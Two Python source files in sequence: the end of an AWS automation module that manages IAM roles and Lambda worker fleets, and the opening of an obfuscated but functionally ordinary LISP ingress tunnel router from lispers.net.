Deletes any existing role with the same name. This role gives read access to
S3 and full access to Cloudwatch Logs.
Args:
name (str): The name to give the role.
"""
log = logging.getLogger("cirrus.automate.set_up_lambda_role")
log.debug("Checking for an already-existing role.")
try:
role = resources.iam_resource.Role(name)
for policy in role.attached_policies.all():
role.detach_policy(PolicyArn=policy.arn)
role.delete()
log.info("There was an already-existing role.")
except Exception:
# FIXME: This is a hack. An error may be caused by something other than
# the role not existing. We should catch only that specific error.
log.info("There was not an already-existing role.")
log.debug("Creating role.")
role = resources.iam_resource.create_role(
RoleName=name,
AssumeRolePolicyDocument=\
"""{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}"""
)
role.attach_policy(PolicyArn=S3_READ_ONLY_ARN)
role.attach_policy(PolicyArn=CLOUDWATCH_WRITE_ARN)
log.debug("Done.")
def make_lambda(name, lambda_package_path, lambda_size, concurrency=-1):
"""Make a worker Lambda function.
Replaces any existing Lambda function with the same name.
Args:
name (str): The name to give the Lambda.
lambda_package_path (str): An S3 path to a Lambda ZIP package produced
by `make_lambda_package`.
lambda_size (int): The amount of memory (in MB) to give to the Lambda
function. Must be a size supported by AWS. As of 11/24/18, the
supported sizes are multiples of 64 in [128, 3008].
concurrency (int): The number of reserved concurrent executions to
allocate to the Lambda. If omitted or -1, the Lambda will use the
account's unreserved concurrent executions in the region.
"""
assert 128 <= lambda_size <= 3008, \
"lambda_size %d is not in [128, 3008]." % lambda_size
assert lambda_size % 64 == 0, \
"lambda_size %d is not divisible by 64." % lambda_size
from . import setup
assert isinstance(concurrency, (int, long))
assert concurrency >= -1
log = logging.getLogger("cirrus.automate.make_lambda")
log.debug("Deleting any existing Lambda.")
try:
resources.lambda_client.delete_function(FunctionName=name)
except Exception:
# This is a hack. An error may be caused by something other than the
# Lambda not existing.
pass
log.debug("Copying package to user's bucket.")
bucket_name = get_bucket_name()
bucket = resources.s3_resource.Bucket(bucket_name)
src_bucket, src_key = _split_s3_url(lambda_package_path)
src = {"Bucket": src_bucket, "Key": src_key}
bucket.copy(src, src_key)
log.debug("Creating Lambda.")
role_arn = resources.iam_resource.Role(setup.LAMBDA_ROLE_NAME).arn
resources.lambda_client.create_function(
FunctionName=name,
Runtime=LAMBDA_RUNTIME,
Role=role_arn,
Handler=LAMBDA_HANDLER_FQID,
Code={
"S3Bucket": bucket_name,
"S3Key": src_key
},
Timeout=LAMBDA_TIMEOUT,
MemorySize=lambda_size
)
if concurrency != -1:
log.debug("Allocating reserved concurrent executions to the Lambda.")
resources.lambda_client.put_function_concurrency(
FunctionName=name,
ReservedConcurrentExecutions=concurrency
)
log.debug("Done.")
def delete_lambda(name):
"""Delete a Lambda function.
Args:
name (str): The name of the Lambda function.
"""
log = logging.getLogger("cirrus.automate.delete_lambda")
log.debug("Deleting Lambda function %s." % name)
resources.lambda_client.delete_function(FunctionName=name)
@utilities.jittery_exponential_backoff(("TooManyRequestsException",), 2, 4, 3)
def launch_worker(lambda_name, task_id, config, num_workers, ps):
"""Launch a worker.
Blocks until the worker terminates.
Args:
lambda_name (str): The name of a worker Lambda function.
task_id (int): The ID number of the task, to be used by the worker to
register with the parameter server.
config (str): A configuration for the worker.
num_workers (int): The total number of workers that are being launched.
ps (ParameterServer): The parameter server that the worker should use.
Raises:
RuntimeError: If the invocation of the Lambda function fails.
"""
log = logging.getLogger("cirrus.automate.launch_worker")
log.debug("Launching Task %d." % task_id)
payload = {
"config": config,
"num_workers": num_workers,
"ps_ip": ps.public_ip(),
"ps_port": ps.ps_port(),
"task_id": task_id,
"log_level": LAMBDA_LOG_LEVEL
}
response = resources.lambda_client_no_retries.invoke(
FunctionName=lambda_name,
InvocationType="RequestResponse",
LogType="Tail",
Payload=json.dumps(payload)
)
status = response["StatusCode"]
message = "Task %d completed with status code %d." \
% (task_id, status)
if status == 200:
log.debug(message)
else:
raise RuntimeError(message)
def maintain_workers(n, config, ps, stop_event, experiment_id, lambda_size):
"""Maintain a fixed-size fleet of workers.
Creates a worker Lambda function to invoke.
Args:
n (int): The number of workers.
config (str): As for `launch_worker`.
ps (ParameterServer): As for `launch_worker`.
stop_event (threading.Event): An event indicating that no new
generations of the workers in the fleet should be launched.
experiment_id (int): The ID number of the experiment that these workers
will work on.
lambda_size (int): As for `make_lambda`.
"""
# Imported here to prevent a circular dependency issue.
from . import setup
# See the documentation for the constant.
assert n <= MAX_WORKERS_PER_EXPERIMENT
# Creates a Lambda function to invoke. Names it uniquely with the
# `experiment_id`, current date, and current time.
now = datetime.datetime.now()
lambda_id = "%d_%d-%d-%d_%d-%d-%d-%d" % (experiment_id, now.year, now.month,
now.day, now.hour, now.minute, now.second, now.microsecond)
lambda_name = setup.LAMBDA_NAME_PREFIX + "_" + lambda_id
lambda_package_path = setup.PUBLISHED_BUILD + "/lambda_package"
concurrency = int(configuration.config()["aws"]["lambda_concurrency_limit"])
make_lambda(lambda_name, lambda_package_path, lambda_size, concurrency)
def clean_up():
"""Clean up after the run.
Deletes the Lambda that was created.
"""
stop_event.wait()
delete_lambda(lambda_name)
def maintain_one(worker_id):
"""Maintain a single worker.
Launches generation after generation of Lambdas to serve as the
`worker_id`-th worker.
Args:
worker_id (int): The ID of the worker, in `[0, n)`.
"""
generation = 0
while not stop_event.is_set():
assert generation < MAX_LAMBDA_GENERATIONS
task_id = worker_id * MAX_LAMBDA_GENERATIONS + generation
start = time.time()
launch_worker(lambda_name, task_id, config, n, ps)
duration = time.time() - start
if duration < MIN_GENERATION_TIME:
time.sleep(MIN_GENERATION_TIME - duration)
generation += 1
# Start the `clean_up` thread. Return immediately.
thread_name = "Exp #%02d Cleanup" % experiment_id
thread = threading.Thread(target=clean_up, name=thread_name)
thread.start()
# Start one `maintain_one` thread per worker desired. Return immediately.
base_id = experiment_id * MAX_WORKERS_PER_EXPERIMENT
for worker_id in range(base_id, base_id + n):
thread_name = "Exp #%02d Wkr #%02d" % (experiment_id, worker_id)
thread = threading.Thread(target=maintain_one, name=thread_name,
args=(worker_id,))
thread.start()
def _split_s3_url(url):
assert url.startswith("s3://")
bucket = url[len("s3://"):].split("/")[0]
key = url[len("s3://") + len(bucket) + 1:]
return bucket, key
|
lisp-itr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = lisp . lisp_get_ephemeral_port ( )
Ii1IIii11 = None
Oooo0000 = None
i11 = None
I11 = None
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1 ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "ITR" , [ ] ) )
if 41 - 41: OoOoOO00
if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ITR" ) )
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "ITR" ) )
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( lisp_sockets , lisp_ephem_port ) :
lisp . lisp_set_exception ( )
if 57 - 57: OOooOOo . OOooOOo
if 95 - 95: O0 + OoO0O00 . II111iiii / O0
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
if 59 - 59: O0 + I1IiiI + IiII % I1IiiI
for o0OOoo0OO0OOO in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for iI1iI1I1i1I in o0OOoo0OO0OOO : del ( iI1iI1I1i1I )
if 24 - 24: I1ii11iIi11i
lisp . lisp_crypto_keys_by_nonce = { }
if 56 - 56: ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if ( lisp . lisp_l2_overlay ) :
O0o0 = lisp . LISP_AFI_MAC
OO00Oo = lisp . lisp_default_iid
O0OOO0OOoO0O = lisp . lisp_address ( O0o0 , "0000-0000-0000" , 0 , OO00Oo )
O0OOO0OOoO0O . mask_len = 0
O00Oo000ooO0 = lisp . lisp_address ( O0o0 , "ffff-ffff-ffff" , 48 , OO00Oo )
lisp . lisp_send_map_request ( lisp_sockets , lisp_ephem_port , O0OOO0OOoO0O , O00Oo000ooO0 , None )
if 100 - 100: O0 + IiII - OOooOOo + i11iIiiIii * Ii1I
if 30 - 30: o0oOOo0O0Ooo . Ii1I - OoooooooOO
if 8 - 8: i1IIi - iIii1I11I1II1 * II111iiii + i11iIiiIii / I1Ii111 % OOooOOo
if 16 - 16: I1ii11iIi11i + OoO0O00 - II111iiii
if 85 - 85: OoOoOO00 + i1IIi
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
i11 = threading . Timer ( 60 , oo0 ,
[ lisp_sockets , lisp_ephem_port ] )
i11 . start ( )
return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
if 86 - 86: OOooOOo
OOoo0O = lisp . lisp_get_timestamp ( )
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . dynamic_eid_configured ( ) == False ) : continue
if 22 - 22: iIii1I11I1II1 / i11iIiiIii * iIii1I11I1II1 * II111iiii . OOooOOo / i11iIiiIii
Iiii = [ ]
for OO0OoO0o00 in Oo0ooOo0o . dynamic_eids . values ( ) :
ooOO0O0ooOooO = OO0OoO0o00 . last_packet
if ( ooOO0O0ooOooO == None ) : continue
if ( ooOO0O0ooOooO + OO0OoO0o00 . timeout > OOoo0O ) : continue
if 55 - 55: o0oOOo0O0Ooo * OoOoOO00
if 61 - 61: I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if ( lisp . lisp_program_hardware ) :
IIIIiiII111 = OO0OoO0o00 . dynamic_eid . print_prefix_no_iid ( )
if ( lisp . lisp_arista_is_alive ( IIIIiiII111 ) ) :
lisp . lprint ( ( "Hardware indicates dynamic-EID {} " + "still active" ) . format ( lisp . green ( IIIIiiII111 , False ) ) )
if 97 - 97: I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
continue
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
oOOo0oOo0 = OO0OoO0o00 . dynamic_eid . print_address ( )
II = "learn%{}%None" . format ( oOOo0oOo0 )
II = lisp . lisp_command_ipc ( II , "lisp-itr" )
lisp . lisp_ipc ( II , lisp_socket , "lisp-etr" )
if 60 - 60: I1IiiI
lisp . lprint ( "Dynamic-EID {}" . format ( lisp . bold ( lisp . green ( oOOo0oOo0 , False ) + " activity timeout" ,
# II111iiii . I1IiiI
False ) ) )
Iiii . append ( oOOo0oOo0 )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
for oOOo0oOo0 in Iiii : Oo0ooOo0o . dynamic_eids . pop ( oOOo0oOo0 )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ lisp_socket ] ) . start ( )
return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0 ( ) :
if ( lisp . lisp_is_macos ( ) ) : return ( [ "en0" , "en1" , "lo0" ] )
if 38 - 38: I1Ii111
if 84 - 84: iIii1I11I1II1 % iII111i / iIii1I11I1II1 % I11i
if 45 - 45: O0
if 26 - 26: I11i - iIii1I11I1II1 - I1IiiI / OoO0O00 . OoOoOO00 % iIii1I11I1II1
OO = "Link encap"
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if ( iIiIIi1 == "" ) :
OO = ": flags="
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if 7 - 7: ooOoO0o - Oo0Ooo - oO0o + ooOoO0o
if 26 - 26: Ii1I
iIiIIi1 = iIiIIi1 . split ( "\n" )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
I1i1Iiiii = [ ]
for OOo0oO00ooO00 in iIiIIi1 :
oOO0O00oO0Ooo = OOo0oO00ooO00 . split ( OO ) [ 0 ] . replace ( " " , "" )
I1i1Iiiii . append ( oOO0O00oO0Ooo )
if 67 - 67: OoO0O00 - OOooOOo
return ( I1i1Iiiii )
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i ( ) :
global II1iII1i
global oO0oIIII
global Oo0oO0oo0oO00
global i111I
global II1Ii1iI1i
global Ii1IIii11 , Oooo0000
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_i_am ( "itr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ITR starting up" )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
II1iII1i [ 0 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV4 )
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
oO0oIIII = lisp . lisp_open_listen_socket ( "" , "lisp-itr" )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
II1iII1i [ 2 ] = oO0oIIII
OoOOoOooooOOo = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
i111I = lisp . lisp_open_listen_socket ( OoOOoOooooOOo ,
str ( iiI1iIiI ) )
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
II1Ii1iI1i = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( OOo ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
Ii1IIii11 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
Ii1IIii11 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if ( lisp . lisp_is_raspbian ( ) == False ) :
Oooo0000 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
lisp . lisp_ipc_socket = oO0oIIII
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
threading . Thread ( target = OoOOo0OOoO ) . start ( )
if 72 - 72: Ii1I
if 1 - 1: OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
i11 = threading . Timer ( 60 , oo0 ,
[ II1iII1i , iiI1iIiI ] )
i11 . start ( )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ oO0oIIII ] ) . start ( )
return ( True )
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
def o0ooooO0o0O ( ) :
iiIi11iI1iii = open ( "./lisp.config" , "r" )
if 67 - 67: O0 / I1Ii111
OOO0000oO = False
iI1i111I1Ii = 0
for i11i1ii1I in iiIi11iI1iii :
if ( i11i1ii1I == "lisp database-mapping {\n" ) : OOO0000oO = True
if ( i11i1ii1I == "}\n" ) : OOO0000oO = False
if ( OOO0000oO == False ) : continue
if ( i11i1ii1I [ 0 ] == " " and i11i1ii1I . find ( "prefix {" ) != - 1 ) : iI1i111I1Ii += 1
if 88 - 88: I11i % I1ii11iIi11i
iiIi11iI1iii . close ( )
return ( iI1i111I1Ii )
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
def O00oOOooo ( ) :
if 50 - 50: I1ii11iIi11i % O0 * o0oOOo0O0Ooo
if 5 - 5: IiII * OoOoOO00
if 5 - 5: I1Ii111
if 90 - 90: I1Ii111 . ooOoO0o / Ii1I - I11i
if 40 - 40: OoooooooOO
iI1i111I1Ii = o0ooooO0o0O ( )
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
I1IiIiiIiIII = os . getenv ( "LISP_ITR_WAIT_TIME" )
I1IiIiiIiIII = 1 if ( I1IiIiiIiIII == None ) else int ( I1IiIiiIiIII )
if 8 - 8: oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
while ( iI1i111I1Ii != len ( lisp . lisp_db_list ) ) :
lisp . lprint ( ( "Waiting {} second(s) for {} database-mapping EID-" + "prefixes, {} processed so far ..." ) . format ( I1IiIiiIiIII , iI1i111I1Ii ,
# I1ii11iIi11i % OoOoOO00 * OoO0O00 % II111iiii
len ( lisp . lisp_db_list ) ) )
time . sleep ( I1IiIiiIiIII )
if 70 - 70: OoO0O00 % oO0o + OOooOOo / Ii1I % O0
if 100 - 100: o0oOOo0O0Ooo + OOooOOo * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo * O0 - Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
oOoOO = [ ]
Ii1i1 = [ ]
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . eid . is_ipv4 ( ) or Oo0ooOo0o . eid . is_ipv6 ( ) or Oo0ooOo0o . eid . is_mac ( ) ) :
oOOo0oOo0 = Oo0ooOo0o . eid . print_prefix_no_iid ( )
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) : Ii1i1 . append ( oOOo0oOo0 )
oOoOO . append ( oOOo0oOo0 )
if 65 - 65: ooOoO0o . OoooooooOO / I1ii11iIi11i . i1IIi * OoO0O00
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
return ( oOoOO , Ii1i1 )
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
def OoOOo0OOoO ( ) :
global i1iIIi1
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
lisp . lisp_set_exception ( )
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
